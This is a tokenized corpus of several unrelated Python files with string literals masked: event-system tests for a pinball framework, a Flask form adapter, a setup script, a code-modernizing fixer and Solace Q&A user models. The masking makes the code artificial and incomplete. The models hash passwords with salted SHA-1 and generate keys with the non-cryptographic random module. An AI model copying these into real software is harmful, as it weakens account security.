events . add_handler ( '<STR_LIT>' , self . event_handler1 ) <EOL> self . machine . events . add_handler ( '<STR_LIT>' , self . event_handler1 ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler1_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler1_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler1_kwargs ) <EOL> self . machine . events . remove_handler_by_event ( '<STR_LIT>' , <EOL> self . event_handler1 ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:2> , self . _handler1_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler1_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler1_kwargs ) <EOL> self . machine . events . remove_handler_by_event ( '<STR_LIT>' , <EOL> self . event_handler1 ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:2> , self . _handler1_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler1_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler1_kwargs ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:3> , self . _handler1_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler1_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler1_kwargs ) <EOL> def test_remove_handler_by_key ( self ) : <EOL> key = self . machine . events . add_handler ( '<STR_LIT>' , <EOL> self . event_handler1 ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler1_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler1_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler1_kwargs ) <EOL> self . machine . events . remove_handler_by_key ( key ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler1_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler1_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler1_kwargs ) <EOL> def test_remove_handlers_by_keys ( self ) : <EOL> keys = list ( ) <EOL> keys . append ( self . machine . events . add_handler ( '<STR_LIT>' , <EOL> self . event_handler1 ) ) <EOL> keys . append ( self . machine . events . add_handler ( '<STR_LIT>' , <EOL> self . event_handler2 ) ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler1_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler1_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler1_kwargs ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler2_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler2_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler2_kwargs ) <EOL> self . machine . events . remove_handlers_by_keys ( keys ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler1_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler1_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler1_kwargs ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler2_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler2_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler2_kwargs ) <EOL> def test_does_event_exist ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , self . event_handler1 ) <EOL> self . assertEquals ( True , <EOL> self . machine . events . does_event_exist ( '<STR_LIT>' ) ) <EOL> self . assertEquals ( False , <EOL> self . machine . events . does_event_exist ( '<STR_LIT>' ) ) <EOL> def test_regular_event_with_false_return ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , self . event_handler1 , <EOL> priority = <NUM_LIT:100> ) <EOL> self . machine . events . add_handler ( '<STR_LIT>' , <EOL> self . event_handler_returns_false , <EOL> priority = <NUM_LIT:200> ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler1_called ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler_returns_false_called ) <EOL> self . assertEquals ( self . _handlers_called [ <NUM_LIT:0> ] , <EOL> self . event_handler_returns_false ) <EOL> self . assertEquals ( self . _handlers_called [ <NUM_LIT:1> ] , self . event_handler1 ) <EOL> def test_post_boolean ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , self . event_handler1 , <EOL> priority = <NUM_LIT:100> ) <EOL> self . machine . events . add_handler ( '<STR_LIT>' , self . event_handler2 , <EOL> priority = <NUM_LIT:200> ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post_boolean ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler1_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler1_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler1_kwargs ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler2_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler2_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler2_kwargs ) <EOL> self . assertEquals ( self . _handlers_called [ <NUM_LIT:0> ] , self . event_handler2 ) <EOL> self . assertEquals ( self . _handlers_called [ <NUM_LIT:1> ] , self . event_handler1 ) <EOL> def test_boolean_event_with_false_return ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , self . event_handler1 , <EOL> priority = <NUM_LIT:100> ) <EOL> self . machine . events . add_handler ( '<STR_LIT>' , <EOL> self . event_handler_returns_false , <EOL> priority = <NUM_LIT:200> ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post_boolean ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:0> , self . _handler1_called ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler_returns_false_called ) <EOL> self . assertEquals ( self . _handlers_called [ <NUM_LIT:0> ] , <EOL> self . event_handler_returns_false ) <EOL> self . assertEquals ( <NUM_LIT:1> , len ( self . _handlers_called ) ) <EOL> def test_relay_event ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , <EOL> self . event_handler_relay1 , <EOL> priority = <NUM_LIT:200> ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post_relay ( '<STR_LIT>' , relay_test = <NUM_LIT:1> , <EOL> callback = self . relay_callback ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _relay1_called ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _relay_callback_called ) <EOL> assert '<STR_LIT>' in self . _relay_callback_kwargs <EOL> assert self . _relay_callback_kwargs [ '<STR_LIT>' ] == <NUM_LIT:1> <EOL> def test_relay_event_handler_changes_value ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , <EOL> self . event_handler_relay1 , <EOL> priority = <NUM_LIT:200> ) <EOL> self . machine . events . add_handler ( '<STR_LIT>' , <EOL> self . event_handler_relay2 , <EOL> priority = <NUM_LIT:100> ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post_relay ( '<STR_LIT>' , relay_test = <NUM_LIT:1> , <EOL> callback = self . relay_callback ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _relay1_called ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _relay2_called ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _relay_callback_called ) <EOL> assert '<STR_LIT>' in self . _relay_callback_kwargs <EOL> self . assertEquals ( self . _relay_callback_kwargs [ '<STR_LIT>' ] , <NUM_LIT:0> ) <EOL> def test_queue ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , <EOL> self . event_handler_add_queue ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post_queue ( '<STR_LIT>' , <EOL> callback = self . queue_callback ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <EOL> self . _handlers_called . count ( self . event_handler_add_queue ) , <NUM_LIT:1> ) <EOL> self . assertEquals ( self . _handlers_called . count ( self . queue_callback ) , <NUM_LIT:0> ) <EOL> self . assertEquals ( False , self . _queue . is_empty ( ) ) <EOL> self . event_handler_clear_queue ( ) <EOL> self . assertEquals ( self . _handlers_called . count ( self . queue_callback ) , <NUM_LIT:1> ) <EOL> self . assertEquals ( True , self . _queue . is_empty ( ) ) <EOL> def test_queue_kill ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , <EOL> self . event_handler_add_queue ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post_queue ( '<STR_LIT>' , <EOL> callback = self . queue_callback ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <EOL> self . _handlers_called . count ( self . event_handler_add_queue ) , <NUM_LIT:1> ) <EOL> self . assertEquals ( self . _handlers_called . count ( self . queue_callback ) , <NUM_LIT:0> ) <EOL> self . _queue . kill ( ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( self . _handlers_called . count ( self . queue_callback ) , <NUM_LIT:0> ) <EOL> def test_queue_event_with_no_queue ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , self . event_handler1 ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post_queue ( '<STR_LIT>' , <EOL> callback = self . queue_callback ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( self . _handlers_called . count ( self . event_handler1 ) , <NUM_LIT:1> ) <EOL> self . assertEquals ( self . _handlers_called . count ( self . queue_callback ) , <NUM_LIT:1> ) <EOL> def test_queue_event_with_handler_that_returns_false ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , <EOL> self . event_handler_add_queue , <EOL> priority = <NUM_LIT:100> ) <EOL> self . machine . events . add_handler ( '<STR_LIT>' , <EOL> self . event_handler_returns_false , <EOL> priority = <NUM_LIT:200> ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post_queue ( '<STR_LIT>' , <EOL> callback = self . queue_callback ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <EOL> self . _handlers_called . count ( self . event_handler_returns_false ) , <NUM_LIT:1> ) <EOL> self . assertEquals ( <EOL> self . _handlers_called . count ( self . event_handler_add_queue ) , <NUM_LIT:0> ) <EOL> self . assertEquals ( self . _handlers_called . count ( self . queue_callback ) , <NUM_LIT:1> ) <EOL> self . assertEquals ( self . _queue_callback_kwargs , { '<STR_LIT>' : False } ) <EOL> def test_queue_event_with_quick_queue_clear ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , <EOL> self . event_handler_add_quick_queue ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post_queue ( '<STR_LIT>' , <EOL> callback = self . queue_callback ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <EOL> self . _handlers_called . count ( self . event_handler_add_quick_queue ) , <NUM_LIT:1> ) <EOL> self . assertEquals ( self . _handlers_called . count ( self . queue_callback ) , <NUM_LIT:1> ) <EOL> self . assertEquals ( True , self . _queue . is_empty ( ) ) <EOL> def test_queue_event_with_no_registered_handlers ( self ) : <EOL> self . machine . events . post_queue ( '<STR_LIT>' , <EOL> callback = self . queue_callback ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( self . _handlers_called . count ( self . queue_callback ) , <NUM_LIT:1> ) <EOL> self . assertIsNone ( self . _queue ) </s>
<s> import pinproc <EOL> proc = pinproc . PinPROC ( pinproc . normalize_machine_type ( '<STR_LIT>' ) ) <EOL> for switch , state in enumerate ( proc . switch_get_states ( ) ) : <EOL> if not switch % <NUM_LIT:16> : <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' . format ( switch / <NUM_LIT:16> ) ) <EOL> print ( '<STR_LIT>' . format ( switch , state ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from flask import _request_ctx_stack , redirect , url_for <EOL> import fungiform <EOL> from fungiform import widgets <EOL> from fungiform . exceptions import ValidationError <EOL> from fungiform . forms import * <EOL> __all__ = list ( x for x in fungiform . forms . __all__ if x != '<STR_LIT>' ) <EOL> __all__ += [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> try : <EOL> from flaskext import babel <EOL> except ImportError : <EOL> babel = None <EOL> class Form ( FormBase ) : <EOL> def _get_translations ( self ) : <EOL> ctx = _request_ctx_stack . top <EOL> if ctx is not None and hasattr ( ctx , '<STR_LIT>' ) : <EOL> return babel . get_translations ( ) <EOL> return FormBase . _get_translations ( self ) <EOL> def _lookup_request_info ( self ) : <EOL> ctx = _request_ctx_stack . top <EOL> if ctx is not None : <EOL> return ctx . request <EOL> def _get_wsgi_environ ( self ) : <EOL> if self . request_info is not None : <EOL> return self . request_info . environ <EOL> def _autodiscover_data ( self ) : <EOL> if self . request_info . method in ( '<STR_LIT>' , '<STR_LIT:POST>' ) : <EOL> return self . request_info . form <EOL> return self . request_info . args <EOL> def _redirect_to_url ( self , url ) : <EOL> return redirect ( url ) <EOL> def _resolve_url ( self , args , kwargs ) : <EOL> return url_for ( * args , ** kwargs ) <EOL> def _get_session ( self ) : <EOL> ctx = _request_ctx_stack . top <EOL> if ctx is not None : <EOL> return ctx . session </s>
<s> try : <EOL> from setuptools import setup <EOL> except ImportError : <EOL> from distutils . core import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> py_modules = [ '<STR_LIT>' ] , <EOL> description = '<STR_LIT>' , <EOL> zip_safe = False , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> from __future__ import absolute_import <EOL> from lib2to3 . fixes import fix_filter <EOL> import libmodernize <EOL> class FixFilter ( fix_filter . FixFilter ) : <EOL> skip_on = "<STR_LIT>" <EOL> def transform ( self , node , results ) : <EOL> result = super ( FixFilter , self ) . transform ( node , results ) <EOL> if not libmodernize . is_listcomp ( result ) : <EOL> libmodernize . touch_import ( u'<STR_LIT>' , u'<STR_LIT>' , node ) <EOL> return result </s>
<s> from __future__ import absolute_import <EOL> from utils import check_on_input <EOL> INT_LONG_ISINSTANCE = ( """<STR_LIT>""" , """<STR_LIT>""" ) <EOL> LONG_INT_ISINSTANCE = ( """<STR_LIT>""" , """<STR_LIT>""" ) <EOL> def test_int_long_isinstance ( ) : <EOL> check_on_input ( * INT_LONG_ISINSTANCE ) <EOL> def test_long_int_isinstance ( ) : <EOL> check_on_input ( * LONG_INT_ISINSTANCE ) </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> import string <EOL> import hmac <EOL> from math import log <EOL> from random import randrange , choice <EOL> from hashlib import sha1 , md5 <EOL> from itertools import chain <EOL> from datetime import datetime <EOL> from sqlalchemy import select <EOL> from sqlalchemy . orm import relation , backref , synonym , Query , dynamic_loader , synonym , eagerload <EOL> from sqlalchemy . orm . interfaces import AttributeExtension <EOL> from sqlalchemy . ext . associationproxy import association_proxy <EOL> from werkzeug import escape , ImmutableList , ImmutableDict , cached_property <EOL> from babel import Locale <EOL> from solace import settings <EOL> from solace . database import atomic_add , mapper <EOL> from solace . utils . formatting import format_creole <EOL> from solace . utils . remoting import RemoteObject <EOL> from solace . database import session <EOL> from solace . schema import users , topics , posts , votes , comments , post_revisions , tags , topic_tags , user_activities , user_badges , user_messages , openid_user_mapping <EOL> _paragraph_re = re . compile ( r'<STR_LIT>' ) <EOL> _key_chars = unicode ( string . letters + string . digits ) <EOL> def random_key ( length ) : <EOL> """<STR_LIT>""" <EOL> return u'<STR_LIT>' . join ( choice ( _key_chars ) for x in xrange ( length ) ) <EOL> def random_password ( length = <NUM_LIT:8> ) : <EOL> """<STR_LIT>""" <EOL> consonants = '<STR_LIT>' <EOL> vowels = '<STR_LIT>' <EOL> return u'<STR_LIT>' . join ( [ choice ( consonants ) + <EOL> choice ( vowels ) + <EOL> choice ( consonants + vowels ) for _ <EOL> in xrange ( length // <NUM_LIT:3> + <NUM_LIT:1> ) ] ) [ : length ] <EOL> def simple_repr ( f ) : <EOL> """<STR_LIT>""" <EOL> def __repr__ ( self ) : <EOL> try : <EOL> val = f ( self ) <EOL> if isinstance ( val , unicode ) : <EOL> val = val . encode ( '<STR_LIT:utf-8>' ) <EOL> except Exception : <EOL> val = '<STR_LIT>' <EOL> return '<STR_LIT>' % ( type ( self ) . __name__ , val ) <EOL> return __repr__ <EOL> class TextRendererMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> render_text_inline = False <EOL> def _get_text ( self ) : <EOL> return self . _text <EOL> def _set_text ( self , value ) : <EOL> self . _text = value <EOL> self . rendered_text = format_creole ( value , inline = self . render_text_inline ) <EOL> text = property ( _get_text , _set_text ) <EOL> del _get_text , _set_text <EOL> class UserQuery ( Query ) : <EOL> """<STR_LIT>""" <EOL> def by_openid_login ( self , identity_url ) : <EOL> """<STR_LIT>""" <EOL> ss = select ( [ openid_user_mapping . c . user_id ] , <EOL> openid_user_mapping . c . identity_url == identity_url ) <EOL> return self . filter ( User . id . in_ ( ss ) ) <EOL> def active_in ( self , locale ) : <EOL> """<STR_LIT>""" <EOL> ua = user_activities . c <EOL> return self . filter ( User . id . in_ ( select ( [ ua . user_id ] , <EOL> ua . locale == str ( locale ) ) ) ) <EOL> class User ( RemoteObject ) : <EOL> """<STR_LIT>""" <EOL> query = session . query_property ( UserQuery ) <EOL> remote_object_type = '<STR_LIT>' <EOL> public_fields = ( '<STR_LIT:id>' , '<STR_LIT:username>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def __init__ ( self , username , email , password = None , is_admin = False ) : <EOL> self . username = username <EOL> self . email = email <EOL> self . pw_hash = None <EOL> self . upvotes = self . downvotes = self . reputation = self . bronce_badges = self . silver_badges = self . gold_badges = self . platin_badges = <NUM_LIT:0> <EOL> self . real_name = u'<STR_LIT>' <EOL> self . is_admin = is_admin <EOL> self . is_active = True <EOL> self . is_banned = False <EOL> self . last_login = None <EOL> if password is not None : <EOL> self . set_password ( password ) <EOL> session . add ( self ) <EOL> badges = association_proxy ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> openid_logins = association_proxy ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def bind_openid_logins ( self , logins ) : <EOL> """<STR_LIT>""" <EOL> currently_attached = set ( self . openid_logins ) <EOL> new_logins = set ( logins ) <EOL> self . openid_logins . difference_update ( <EOL> currently_attached . difference ( new_logins ) ) <EOL> self . openid_logins . update ( <EOL> new_logins . difference ( currently_attached ) ) <EOL> def _get_active ( self ) : <EOL> return self . activation_key is None <EOL> def _set_active ( self , val ) : <EOL> if val : <EOL> self . activation_key = None <EOL> else : <EOL> self . activation_key = random_key ( <NUM_LIT:10> ) <EOL> is_active = property ( _get_active , _set_active ) <EOL> del _get_active , _set_active <EOL> @ property <EOL> def is_moderator ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . is_admin or self . reputation >= settings . REPUTATION_MAP [ '<STR_LIT>' ] <EOL> @ property <EOL> def display_name ( self ) : <EOL> return self . real_name or self . username <EOL> def get_avatar_url ( self , size = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> assert <NUM_LIT:8> < size < <NUM_LIT> , '<STR_LIT>' <EOL> return '<STR_LIT>' % ( <EOL> settings . GRAVATAR_URL . rstrip ( '<STR_LIT:/>' ) , <EOL> md5 ( self . email . lower ( ) ) . hexdigest ( ) , <EOL> settings . GRAVATAR_FALLBACK , <EOL> size <EOL> ) <EOL> avatar_url = property ( get_avatar_url ) <EOL> def get_url_values ( self ) : <EOL> return '<STR_LIT>' , dict ( username = self . username ) <EOL> def upvote ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> obj . _set_vote ( self , <NUM_LIT:1> ) <EOL> def downvote ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> obj . _set_vote ( self , - <NUM_LIT:1> ) <EOL> def unvote ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> obj . _set_vote ( self , <NUM_LIT:0> ) <EOL> def has_upvoted ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> return obj . _get_vote ( self ) > <NUM_LIT:0> <EOL> def has_downvoted ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> return obj . _get_vote ( self ) < <NUM_LIT:0> <EOL> def has_not_voted ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> return obj . _get_vote ( self ) == <NUM_LIT:0> <EOL> def pull_votes ( self , posts ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . _vote_cache = { } <EOL> to_pull = set ( ) <EOL> for post in posts : <EOL> if post . id not in self . _vote_cache : <EOL> to_pull . add ( post . id ) <EOL> if to_pull : <EOL> votes = _Vote . query . filter ( <EOL> ( _Vote . post_id . in_ ( to_pull ) ) & <EOL> ( _Vote . user == self ) <EOL> ) . all ( ) <EOL> for vote in votes : <EOL> self . _vote_cache [ vote . post_id ] = vote . delta <EOL> to_pull . discard ( vote . post_id ) <EOL> self . _vote_cache . update ( ( x , <NUM_LIT:0> ) for x in to_pull ) <EOL> @ property <EOL> def password_reset_key ( self ) : <EOL> """<STR_LIT>""" <EOL> mac = hmac . new ( settings . SECRET_KEY ) <EOL> mac . update ( str ( self . pw_hash ) ) <EOL> mac . update ( self . email . encode ( '<STR_LIT:utf-8>' ) ) <EOL> if self . real_name : <EOL> mac . update ( self . real_name . encode ( '<STR_LIT:utf-8>' ) ) <EOL> mac . update ( str ( self . last_login ) ) <EOL> return mac . hexdigest ( ) <EOL> def check_password ( self , password ) : <EOL> """<STR_LIT>""" <EOL> if self . pw_hash is None : <EOL> return False <EOL> salt , pwhash = self . pw_hash . split ( '<STR_LIT:$>' , <NUM_LIT:1> ) <EOL> check = sha1 ( '<STR_LIT>' % ( salt , password . encode ( '<STR_LIT:utf-8>' ) ) ) . hexdigest ( ) <EOL> return check == pwhash <EOL> def set_password ( self , password ) : <EOL> """<STR_LIT>""" <EOL> salt = randrange ( <NUM_LIT:1000> , <NUM_LIT> ) <EOL> self . pw_hash = '<STR_LIT>' % ( salt , sha1 ( '<STR_LIT>' % ( <EOL> salt , <EOL> password . encode ( '<STR_LIT:utf-8>' ) <EOL> ) ) . hexdigest ( ) ) <EOL> def set_random_password ( self ) : <EOL> """<STR_LIT>""" <EOL> password = random_password ( ) <EOL> self . set_password ( password ) <EOL> return password <EOL> def can_edit ( self , post ) : <EOL> """<STR_LIT>""" <EOL> if self . is_admin : <EOL> return True <EOL> if post . author == self : <EOL> return True <EOL> return self . reputation >= settings . REPUTATION_MAP [ '<STR_LIT>' ] <EOL> def can_accept_as_answer ( self , post ) : <EOL> """<STR_LIT>""" <EOL> if self . is_admin : <EOL> return True <EOL> if post . topic . author == self : <EOL> return True <EOL> if post . author == self : <EOL> return self . reputation >= settings . REPUTATION_MAP [ '<STR_LIT>' ] <EOL> return self . reputation >= settings . REPUTATION_MAP [ '<STR_LIT>' ] <EOL> def can_unaccept_as_answer ( self , post ) : <EOL> """<STR_LIT>""" <EOL> if self . is_admin : <EOL> return True <EOL> if post . topic . author == self : <EOL> return True <EOL> return self . reputation >= settings . REPUTATION_MAP [ '<STR_LIT>' ] <EOL> def touch_activity ( self , locale , points ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . _activity_cache = { } <EOL> activity = self . _activity_cache . get ( locale ) <EOL> if activity is None : <EOL> activity = _UserActivity . query . filter_by ( <EOL> user = self , locale = locale ) . first ( ) <EOL> if activity is None : <EOL> activity = _UserActivity ( self , locale ) <EOL> self . _activity_cache [ locale ] = activity <EOL> atomic_add ( activity , '<STR_LIT>' , points ) <EOL> activity . last_activity = datetime . utcnow ( ) <EOL> @ property <EOL> def activities ( self ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . _activity_cache = d = { } <EOL> activities = _UserActivity . query . filter_by ( user = self ) . all ( ) <EOL> for activity in activities : <EOL> d [ activity . locale ] = activity <EOL> return ImmutableDict ( self . _activity_cache ) <EOL> @ property <EOL> def active_in ( self ) : <EOL> """<STR_LIT>""" <EOL> return ImmutableList ( x [ <NUM_LIT:0> ] for x in sorted ( self . activities . items ( ) , <EOL> key = lambda x : - x [ <NUM_LIT:1> ] . counter ) ) <EOL> def get_badges_with_count ( self ) : <EOL> """<STR_LIT>""" <EOL> result = { } <EOL> for badge in self . badges : <EOL> result [ badge . identifier ] = result . get ( badge . identifier , <NUM_LIT:0> ) + <NUM_LIT:1> <EOL> return result <EOL> @ simple_repr <EOL> def __repr__ ( self ) : <EOL> return repr ( self . username ) <EOL> class UserMessage ( object ) : <EOL> """<STR_LIT>""" <EOL> query = session . query_property ( ) <EOL> def __init__ ( self , user , text , type = '<STR_LIT:info>' ) : <EOL> assert type in ( '<STR_LIT:info>' , '<STR_LIT:error>' ) , '<STR_LIT>' <EOL> self . user = user <EOL> self . text = text <EOL> self . type = type <EOL> session . add ( self ) <EOL> @ simple_repr <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . id , self . user . username ) <EOL> class TopicQuery ( Query ) : <EOL> """<STR_LIT>""" <EOL> def language ( self , locale ) : <EOL> """<STR_LIT>""" <EOL> return self . filter_by ( locale = Locale . parse ( locale ) ) <EOL> def unanswered ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . filter_by ( answer = None ) <EOL> def eagerposts ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . options ( eagerload ( '<STR_LIT>' ) , <EOL> eagerload ( '<STR_LIT>' ) , <EOL> eagerload ( '<STR_LIT>' ) ) <EOL> class Topic ( RemoteObject ) : <EOL> """<STR_LIT>""" <EOL> query = session . query_property ( TopicQuery ) <EOL> remote_object_type = '<STR_LIT>' <EOL> public_fields = ( '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:title>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:date>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __init__ ( self , locale , title , text , user , date = None ) : <EOL> self . locale = Locale . parse ( locale ) <EOL> self . title = title <EOL> self . reply_count = - <NUM_LIT:1> <EOL> self . is_deleted = False <EOL> self . votes = <NUM_LIT:0> <EOL> self . question = Post ( self , user , text , date , is_reply = False ) <EOL> self . date = self . question . created <EOL> self . author = self . question . author <EOL> self . answer = None <EOL> self . last_change = self . question . created <EOL> self . _update_hotness ( ) <EOL> session . add ( self ) <EOL> try_award ( '<STR_LIT>' , user , self ) <EOL> @ property <EOL> def guid ( self ) : <EOL> """<STR_LIT>""" <EOL> return u'<STR_LIT>' % ( <EOL> settings . TAG_AUTHORITY , <EOL> self . date . strftime ( '<STR_LIT>' ) , <EOL> self . question . id <EOL> ) <EOL> @ property <EOL> def replies ( self ) : <EOL> return ImmutableList ( [ x for x in self . posts if not x . is_question ] ) <EOL> @ property <EOL> def slug ( self ) : <EOL> return slugify ( self . title ) or None <EOL> def delete ( self ) : <EOL> """<STR_LIT>""" <EOL> self . question . delete ( ) <EOL> def restore ( self ) : <EOL> """<STR_LIT>""" <EOL> self . question . restore ( ) <EOL> def accept_answer ( self , post , user = None ) : <EOL> """<STR_LIT>""" <EOL> assert post is None or post . topic == self , '<STR_LIT>' <EOL> if self . answer is not None : <EOL> self . answer . is_answer = False <EOL> atomic_add ( self . answer . author , '<STR_LIT>' , <EOL> - settings . REPUTATION_MAP [ '<STR_LIT>' ] ) <EOL> if user is None : <EOL> user = post and post . author or self . author <EOL> if post is not None : <EOL> post . is_answer = True <EOL> atomic_add ( post . author , '<STR_LIT>' , <EOL> settings . REPUTATION_MAP [ '<STR_LIT>' ] ) <EOL> self . answer_author = post . author <EOL> self . answer_date = post . created <EOL> self . answer = post <EOL> try_award ( '<STR_LIT>' , user , self , post ) <EOL> def bind_tags ( self , tags 